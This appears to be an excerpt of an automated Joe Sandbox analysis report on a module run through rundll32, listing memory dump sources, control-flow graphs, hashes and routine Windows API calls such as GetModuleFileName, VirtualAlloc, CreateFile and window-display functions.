                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                              • String ID: en-GB,en,en-US,
                              • API String ID: 975949045-3021119265
                              • Opcode ID: 2618115befa02c5036790c5bb505b34dc48d2c8fdc76e1d711132b822fad4791
                              • Instruction ID: f710a54e68e8da8345eb6ff6b9f577f5a900d18e4de06dac8b9b955de96b8786
                              • Opcode Fuzzy Hash: 2618115befa02c5036790c5bb505b34dc48d2c8fdc76e1d711132b822fad4791
                              • Instruction Fuzzy Hash: 0921A5247506017BFB20BAB9C801E1929FA9FC975CF9146B6B10097250DEB4FD40C7B2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 67 494a6f8-494a705 68 494a707 67->68 69 494a70c-494a740 GetCurrentThreadId 67->69 68->69 70 494a744-494a770 call 494a5dc 69->70 71 494a742 69->71 74 494a772-494a774 70->74 75 494a779-494a780 70->75 71->70 74->75 76 494a776 74->76 77 494a782-494a785 75->77 78 494a78a-494a790 75->78 76->75 77->78 79 494a795-494a79c 78->79 80 494a792 78->80 81 494a79e-494a7a5 79->81 82 494a7ab-494a7af 79->82 80->79 81->82 83 494aa44-494aa5e 82->83 84 494a7b5 call 494a68c 82->84 86 494aa60-494aa6c call 494a924 call 494a9ac 83->86 87 494aa71-494aa78 83->87 88 494a7ba 84->88 86->87 90 494aa7a-494aa85 GetCurrentThreadId 87->90 91 494aa9b-494aa9f 87->91 90->91 93 494aa87-494aa96 call 494a5fc call 494a980 90->93 94 494aaa1-494aaa5 91->94 95 494aab9-494aabd 91->95 93->91 94->95 96 494aaa7-494aab7 94->96 97 494aabf-494aac2 95->97 98 494aac9-494aacd 95->98 96->95 97->98 101 494aac4-494aac6 97->101 102 494aaec-494aaf5 call 494a624 98->102 103 494aacf-494aad8 call 4946f7c 98->103 101->98 112 494aaf7-494aafa 102->112 113 494aafc-494ab01 102->113 103->102 114 494aada-494aaea call 4948ea8 call 4946f7c 103->114 112->113 115 494ab1d-494ab28 call 494a5fc 112->115 113->115 116 494ab03-494ab11 call 494eaec 113->116 114->102 125 494ab2d-494ab31 115->125 126 494ab2a 115->126 116->115 124 494ab13-494ab15 116->124 124->115 128 494ab17-494ab18 FreeLibrary 124->128 129 494ab33-494ab35 call 494a980 125->129 130 494ab3a-494ab3d 125->130 126->125 128->115 129->130 132 494ab56-494ab67 130->132 133 494ab3f-494ab46 130->133 132->95 134 494ab4e-494ab51 ExitProcess 133->134 135 494ab48 133->135 135->134
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 0494A72F
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 7dec185368b29423906c44ffb75ace0ca14760ff492d6290995a57704cc810f0
                              • Instruction ID: 1b850700311c4f92d3ee2f75440d0fa5bfe43f16635f344bca80fdafff181433
                              • Opcode Fuzzy Hash: 7dec185368b29423906c44ffb75ace0ca14760ff492d6290995a57704cc810f0
                              • Instruction Fuzzy Hash: A7518E746803459FEB24DFA9C584F5A7BE9EBC8328F14857AE8058B241D738FC84CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000000,0494E8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0494E946,00000000,?,00000105), ref: 0494E853
                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0494E8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0494E946,00000000,?,00000105), ref: 0494E87B
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: DefaultLanguage$SystemUser
                              • String ID:
                              • API String ID: 384301227-0
                              • Opcode ID: d7a3ea8d42130a417d2fd411cdf1419ef50f7ce091fc28dc1360c44548301b24
                              • Instruction ID: 8b360c8c36a0d3974f06d32196f6760a344150fcf9fdfd0752dc165e74a2a5ed
                              • Opcode Fuzzy Hash: d7a3ea8d42130a417d2fd411cdf1419ef50f7ce091fc28dc1360c44548301b24
                              • Instruction Fuzzy Hash: 8031E774A102199BEF15EF98C880EAEB7B9BFC8318F504975D510A7350DBB4BE81CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0494E986,?,04940000,04B91C1C), ref: 0494E908
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0494E986,?,04940000,04B91C1C), ref: 0494E959
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName
                              • String ID:
                              • API String ID: 1159719554-0
                              • Opcode ID: 59fbafec106da112b65d4150949b5cef787bbda537ec256dd4b67a0fdd370879
                              • Instruction ID: d4c3d1d917e1c4b48db8d4f598ba7143ee741aab12bbba15cc01627f39254a4a
                              • Opcode Fuzzy Hash: 59fbafec106da112b65d4150949b5cef787bbda537ec256dd4b67a0fdd370879
                              • Instruction Fuzzy Hash: F0117770A4421CABEB14DFA4CC85FDDB3B8EBC4714F5145B5A508A7290DA74BF84CE94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 226 494d658-494d666 227 494d693-494d69e 226->227 228 494d668-494d67f GetModuleFileNameW call 494e8cc 226->228 230 494d684-494d68b 228->230 230->227 231 494d68d-494d690 230->231 231->227
                              APIs
                              • GetModuleFileNameW.KERNEL32(04940000,?,0000020A), ref: 0494D676
                                • Part of subcall function 0494E8CC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0494E986,?,04940000,04B91C1C), ref: 0494E908
                                • Part of subcall function 0494E8CC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0494E986,?,04940000,04B91C1C), ref: 0494E959
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: FileModuleName$LibraryLoad
                              • String ID:
                              • API String ID: 4113206344-0
                              • Opcode ID: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction ID: 07314c82063e984ccffe9d5b9739aafad53367a9e050d9522b79befaf83aa017
                              • Opcode Fuzzy Hash: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction Fuzzy Hash: C0E0ED75A003109BDF50DE5CC8C4E4637D8AB88764F044AB1AD18CF346E371E914C7D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 49502f4-4950304 GetSystemInfo
                              APIs
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem
                              • String ID:
                              • API String ID: 31276548-0
                              • Opcode ID: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction ID: 08ab2546b6842882c792f2f149b1c1aef10c71a2b22bf3927472829688efda0a
                              • Opcode Fuzzy Hash: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction Fuzzy Hash: 94A012104084005BC804E7988C4280B318019C0224FC40220645C956A1E605996806D7
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 4945694-49456b2 call 4945628 VirtualAlloc 236 49456b4-4945701 233->236 237 4945702-494570d 233->237
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,04945CAB), ref: 049456AB
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 1c5960489591d75728881de2cd1c34f84554aa7fb107e9a1d94116ce5b0c4c45
                              • Instruction ID: 49cb600fe4ae51b382a7243d572a30d0e5a437bb4d8d6b37f3373ece56d937ae
                              • Opcode Fuzzy Hash: 1c5960489591d75728881de2cd1c34f84554aa7fb107e9a1d94116ce5b0c4c45
                              • Instruction Fuzzy Hash: 81F08CF2B413415BE7189FB89B40B027BD4E788354F21417EEA49DB684DBB89C028794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 0494DFF5
                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0494E006
                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 0494E106
                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 0494E118
                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 0494E124
                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 0494E169
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                              • String ID: GetLongPathNameW$\$kernel32.dll
                              • API String ID: 1930782624-3908791685
                              • Opcode ID: c8b7a55c261f13e1f2e9b11664a16196407e48dcea458bba8509739335aaf01a
                              • Instruction ID: 21efd1b0856891ee6e53bd621331a0b329293f6086fca0013ac57a6ffee08fe1
                              • Opcode Fuzzy Hash: c8b7a55c261f13e1f2e9b11664a16196407e48dcea458bba8509739335aaf01a
                              • Instruction Fuzzy Hash: 0E418E35E00618ABDF20EEA8CC84EDDB3BABFC8314F1486B58504E7244E774BE458B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 04B2A98E
                              • IsIconic.USER32(?), ref: 04B2A9BC
                              • IsWindowVisible.USER32(?), ref: 04B2A9CC
                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,04B37CEF,?,04BA01D8), ref: 04B2A9E9
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04B2A9FC
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 04B2AA0D
                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,04B37CEF,?,04BA01D8), ref: 04B2AA2D
                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,04B37CEF,?,04BA01D8), ref: 04B2AA37
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Window$LongShow$IconicVisible
                              • String ID:
                              • API String ID: 3484284227-0
                              • Opcode ID: 243891d753c0975f997e18be28a9f90e1d9aaccac462d16797a3c9dadb621813
                              • Instruction ID: 517e8948d2887d2ef63f88033c2fc8e9b142acab7fffb2b24841d32fb956f624
                              • Opcode Fuzzy Hash: 243891d753c0975f997e18be28a9f90e1d9aaccac462d16797a3c9dadb621813
                              • Instruction Fuzzy Hash: 1911AB0254D6F039E722B6251E01FAF2D948FD7319F2849F5FCDC921D2D219A5479327
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 291 4947948-4947962 292 4947964-4947967 291->292 293 4947973-4947984 291->293 294 4947986-4947997 292->294 295 4947969-494796c 292->295 296 49479aa-49479b6 293->296 294->296 297 494796e 295->297 298 4947999-49479a3 295->298 299 4947a60-4947a80 CreateFileW 296->299 300 49479bc-49479c0 296->300 301 4947bab-4947bb1 297->301 298->296 302 4947a94-4947a9c 299->302 303 4947a82-4947a8f GetLastError 299->303 304 49479d2-49479df 300->304 305 49479c2-49479cb 300->305 306 4947b64-4947b6c 302->306 307 4947aa2-4947ab7 GetFileSize 302->307 303->301 308 49479e1-49479e7 304->308 309 49479ff-4947a06 GetStdHandle 304->309 305->304 310 4947b7c-4947b82 306->310 311 4947b6e-4947b75 306->311 313 4947ac7-4947acf 307->313 314 4947ab9-4947ac2 call 4947930 307->314 315 49479f0 308->315 316 49479e9-49479ee 308->316 312 4947a08-4947a10 309->312 310->301 318 4947b84-4947b8f GetFileType 310->318 311->310 312->310 317 4947a16-4947a21 GetFileType 312->317 321 4947ad1 313->321 322 4947ad3-4947ae1 SetFilePointer 313->322 314->301 320 49479f5-49479fd GetStdHandle 315->320 316->320 325 4947a23-4947a29 317->325 326 4947a4d-4947a5b 317->326 327 4947b96-4947ba2 call 4947930 318->327 328 4947b91-4947b92 318->328 320->312 321->322 323 4947b02-4947b0b call 4947930 322->323 324 4947ae3-4947b00 ReadFile 322->324 323->301 324->323 330 4947b10-4947b14 324->330 332 4947a3c-4947a48 GetConsoleCP 325->332 333 4947a2b-4947a37 GetConsoleOutputCP 325->333 326->310 327->301 334 4947ba4 328->334 335 4947b94 328->335 330->306 338 4947b16-4947b1a 330->338 332->310 333->310 334->301 335->301 338->306 340 4947b1c-4947b22 338->340 340->306 341 4947b24-4947b27 340->341 342 4947b2d-4947b30 341->342 343 4947b32-4947b46 SetFilePointer 342->343 344 4947b5f-4947b62 342->344 345 4947b54-4947b5d call 4947930 343->345 346 4947b48-4947b52 SetEndOfFile 343->346 344->306 344->342 345->301 346->306 346->345
                              APIs
                              • GetStdHandle.KERNEL32(FFFFFFF5), ref: 049479F6
                              • GetStdHandle.KERNEL32(000000F6), ref: 04947A01
                              • GetFileType.KERNEL32(00000000), ref: 04947A19
                              • GetConsoleOutputCP.KERNEL32(00000000), ref: 04947A2B
                              • GetConsoleCP.KERNEL32(00000000), ref: 04947A3C
                              • GetFileType.KERNEL32(00000000), ref: 04947B87
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleFileHandleType$Output
                              • String ID:
                              • API String ID: 393880136-0
                              • Opcode ID: 92fa6b8021ccf1410745571e42678b04d3a2f0e057ddee17cb54816ba1d46e54
                              • Instruction ID: 4a8f5380c3d1d52117c9f4459c7e43e4c4ddd9c77fe304593f708ffec688bec8
                              • Opcode Fuzzy Hash: 92fa6b8021ccf1410745571e42678b04d3a2f0e057ddee17cb54816ba1d46e54
                              • Instruction Fuzzy Hash: 6E519474600208ABEF20AFE8C8C4F2636A9AFC4364F158AF5D9158F2C5E774F94487A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 049496B9
                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 049496BF
                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 049496D2
